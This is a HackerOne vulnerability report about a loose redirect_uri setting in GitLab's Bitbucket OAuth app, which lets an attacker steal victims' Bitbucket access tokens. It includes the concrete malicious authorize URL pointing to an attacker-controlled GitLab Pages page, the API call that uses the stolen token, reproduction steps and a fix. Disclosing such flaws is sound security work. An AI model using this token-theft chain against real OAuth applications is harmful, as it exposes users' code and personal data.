Stealing users Bitbucket app tokens to retrieve sensitive data from connected Bitbucket accounts

HackerOne report #479007 by mishre on 2019-01-13, assigned to dappelt:

Summary:
Due to a misconfiguration of the Gitlab application on Bitbucket it is possible for an attacker to steal a powerful access token that can be used to retrieve information from Bitbucket about the victim (such as the users repository, code and email address).

Description:
Gitlab provides users with an option to import repositories from Bitbucket / Login with Bitbucket.
This functionality work by utilizing the OAuth protocol. But, the Gitlab application on Bitbucket is improperly configured - allowing the redirect_uri parameter to be any url on https://gitlab.com/*.
So by making a victim click on the following link (while logged in to Bitbucket, and after he authorized the Gitlab application):

https://bitbucket.org/site/oauth2/authorize?client_id=b9jLmh8WCLZPBAwWba&redirect_uri=https://gitlab.com/michaelreizaa/aaa/-/jobs/145148315/artifacts/file/public/index.html&response_type=token&state=92970058e18b2dd404215e174fc93029508edc13f5035af9  

I am able to steal a victim's Bitbucket token. This is made possible since https://gitlab.com/michaelreizaa/aaa/-/jobs/145148315/artifacts/file/public/index.html actually redirects to a page on Gitlab Pages, which has user controlled javascript running on it.
An attacker can then launch the following url to retrieve the victim's details from Bitbucket:

https://api.bitbucket.org/2.0/user/emails?access_token={token-retrieved-from-pages-page}  

Note: The attacker can also use this token to gain access to the victim's repositories if the victim has authorized the Gitlab application to this (which usually happens if the user wants to import from Bitbucket).

Steps To Reproduce:

1. Create an account on Gitlab.com using Bitbucket.
2. While being logged in to Bitbucket browse this url:

https://bitbucket.org/site/oauth2/authorize?client_id=b9jLmh8WCLZPBAwWba&redirect_uri=https://gitlab.com/michaelreizaa/aaa/-/jobs/145148315/artifacts/file/public/index.html&response_type=token&state=92970058e18b2dd404215e174fc93029508edc13f5035af9  

You should be redirected to a page that will show you the access_token generated for you - copy it.
3) Now launch:

https://api.bitbucket.org/2.0/user/emails?access_token={token-retrieved-from-pages-page}  

and you should be able to see the victim's email.

Resolution

Configure the Gitlab application on Bitbucket to only allow redirection to certain pages on Gitlab.com (restrict redirect_uri's).

Impact

An attacker can gain access to a victim's Bitbucket details such as code, and personal details.